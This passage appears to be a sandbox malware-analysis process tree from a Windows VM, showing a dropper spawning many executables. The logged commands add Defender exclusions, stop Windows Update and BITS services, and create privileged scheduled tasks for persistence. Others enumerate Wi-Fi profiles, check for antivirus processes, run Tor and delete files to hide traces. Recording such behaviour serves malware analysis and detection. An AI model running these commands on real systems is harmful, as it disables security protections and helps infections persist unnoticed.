                                                                                                                                                          PID:2004
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                            6⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            PID:3100
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
                                                                                                                                                          5⤵
                                                                                                                                                            PID:5272
                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                              sc stop UsoSvc
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:196
                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                              sc stop WaaSMedicSvc
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:3960
                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                              sc stop wuauserv
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:5876
                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                              sc stop DoSvc
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:1260
                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                              sc stop BITS
                                                                                                                                                              6⤵
                                                                                                                                                              • Launches sc.exe
                                                                                                                                                              PID:6496
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\526226167.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\526226167.exe
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4760
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:5504
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:7084
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4696
                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                        schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:6244
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1212519265.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\1212519265.exe
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:6020
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\497811603.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\497811603.exe
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:6944
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1131138103.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1131138103.exe
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:2128
                                                                                                                                                                      • C:\Users\Admin\Desktop\Files\Client-built.exe
                                                                                                                                                                        "C:\Users\Admin\Desktop\Files\Client-built.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:196
                                                                                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                            "schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
                                                                                                                                                                            4⤵
                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                            PID:5148
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5348
                                                                                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                                                                "schtasks" /create /tn "MS Build Tools" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Microsoft-Build-Tools\Client.exe" /rl HIGHEST /f
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                PID:4064
                                                                                                                                                                          • C:\Users\Admin\Desktop\Files\v7wa24td.exe
                                                                                                                                                                            "C:\Users\Admin\Desktop\Files\v7wa24td.exe"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1276
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\dp3s81isgn\tor\tor-real.exe" -f "C:\Users\Admin\AppData\Local\dp3s81isgn\tor\torrc.txt"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:6396
                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                  "cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                                  PID:7052
                                                                                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                                                                                    chcp 65001
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:7132
                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                      netsh wlan show profiles
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                                                                                                                                                      PID:2268
                                                                                                                                                                                    • C:\Windows\system32\findstr.exe
                                                                                                                                                                                      findstr /R /C:"[ ]:[ ]"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:6204
                                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                      "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3000
                                                                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                                                                          chcp 65001
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:1800
                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                            netsh wlan show networks mode=bssid
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:6152
                                                                                                                                                                                            • C:\Windows\system32\findstr.exe
                                                                                                                                                                                              findstr "SSID BSSID Signal"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:6160
                                                                                                                                                                                          • C:\Users\Admin\Desktop\Files\hs.exe
                                                                                                                                                                                            "C:\Users\Admin\Desktop\Files\hs.exe"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6500
                                                                                                                                                                                            • C:\Users\Admin\Desktop\Files\12.exe
                                                                                                                                                                                              "C:\Users\Admin\Desktop\Files\12.exe"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:6700
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Desktop\Files\12.exe" & del "C:\ProgramData\*.dll"" & exit
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                    PID:7128
                                                                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                      timeout /t 5
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                      PID:6768
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 1400
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:6740
                                                                                                                                                                                                • C:\Users\Admin\Desktop\Files\major.exe
                                                                                                                                                                                                  "C:\Users\Admin\Desktop\Files\major.exe"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:6292
                                                                                                                                                                                                  • C:\Users\Admin\Desktop\Files\MARRON.exe
                                                                                                                                                                                                    "C:\Users\Admin\Desktop\Files\MARRON.exe"
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:6736
                                                                                                                                                                                                    • C:\Users\Admin\Desktop\Files\XClient.exe
                                                                                                                                                                                                      "C:\Users\Admin\Desktop\Files\XClient.exe"
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:6732
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\XClient.exe'
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:2788
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:2708
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Google Chrome.exe'
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:3364
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                          PID:3396
                                                                                                                                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Google Chrome" /tr "C:\Users\Admin\AppData\Local\Google Chrome.exe"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                          PID:6784
                                                                                                                                                                                                      • C:\Users\Admin\Desktop\Files\coreplugin.exe
                                                                                                                                                                                                        "C:\Users\Admin\Desktop\Files\coreplugin.exe"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:976
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k move Anytime Anytime.cmd & Anytime.cmd & exit
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:5956
                                                                                                                                                                                                              • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                tasklist
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Enumerates processes with tasklist
                                                                                                                                                                                                                PID:6896
                                                                                                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                findstr /I "wrsa.exe opssvc.exe"
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:3412
                                                                                                                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                  tasklist
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Enumerates processes with tasklist
                                                                                                                                                                                                                  PID:7292
                                                                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                  findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:8816
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    cmd /c md 297145
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:8220
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                      findstr /V "CorkBkConditionsMoon" Scary
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:9168
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        cmd /c copy /b ..\Dependence + ..\Nsw + ..\Developmental + ..\Shared + ..\Ranges + ..\Notify + ..\Pending + ..\Previously k
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:9072
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\297145\Cultures.pif
                                                                                                                                                                                                                          Cultures.pif k
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:3112
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                            choice /d y /t 5
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:8584
                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\Files\CompleteStudio.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\Files\CompleteStudio.exe"
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:2188
                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:1124
                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                  PID:404
                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\Files\octus.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\Files\octus.exe"
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1492
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe"
                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                      PID:4984
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                        /c timeout 5 && del "C:\Users\Admin\AppData\Roaming\ff5c5ee747fc\feburary.exe" && exit
                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                          PID:3416
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                            timeout 5
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                            • Delays execution with timeout.exe
                                                                                                                                                                                                                                            PID:6200
                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\Files\m.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\Files\m.exe"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3936
                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\Files\system404.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\Files\system404.exe"
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                          PID:4748
                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\Files\qth5kdee.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\Files\qth5kdee.exe"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:2880
                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\Files\aaa.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\Files\aaa.exe"
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:2312
                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\Files\Setup.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\Files\Setup.exe"
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:7880
                                                                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:7580
                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\4363463463464363463463463.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\4363463463464363463463463.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:6328
                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\Files\1SkillLauncher.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\Files\1SkillLauncher.exe"
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:5136
                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\Files\EakLauncher_Update.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\Files\EakLauncher_Update.exe"
                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                          PID:2528
                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\Files\RenderMan.Zoom.LabVIEW.1.8.1.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Desktop\Files\RenderMan.Zoom.LabVIEW.1.8.1.exe"
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:948
                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/rsM4AgvAhn
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:6264
                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d1ec3cb8,0x7ff9d1ec3cc8,0x7ff9d1ec3cd8
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:7136
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                        PID:6992
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2376 /prefetch:3
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:7004
                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                            PID:2140
                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:2212
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:4928
                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:1
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:6756
                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2916 /prefetch:8
                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                    PID:8196
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1912,11009046646526046325,5996045653455134997,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=1896 /prefetch:8
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                      PID:3416
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\Files\r.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\Files\r.exe"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:176
                                                                                                                                                                                                                                                                                • \??\c:\windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:8420
                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\Files\t.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\Files\t.exe"
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:6572
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\Files\MJPVgHw.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Desktop\Files\MJPVgHw.exe"
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:6132
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                          PID:7044
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Desktop\Files\downloader.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Desktop\Files\downloader.exe"
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:2860
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\Files\del.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Desktop\Files\del.exe"
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:3400
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F52A.tmp\F52B.tmp\F52C.bat C:\Users\Admin\Desktop\Files\del.exe"
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:7752
                                                                                                                                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                                                                                                                                  TIMEOUT /T 5
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                  PID:7840
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\Files\tpeinf.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\Files\tpeinf.exe"
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:5668
                                                                                                                                                                                                                                                                                                • C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:7400
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\Files\123.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\Files\123.exe"
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:7772
                                                                                                                                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                        PID:4160
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\Files\twztl.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Desktop\Files\twztl.exe"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:8864
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\sysppvrdnvs.exe
                                                                                                                                                                                                                                                                                                          C:\Users\Admin\sysppvrdnvs.exe
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:7244
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:6132
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                  powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                  PID:7100
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
                                                                                                                                                                                                                                                                                                                5⤵
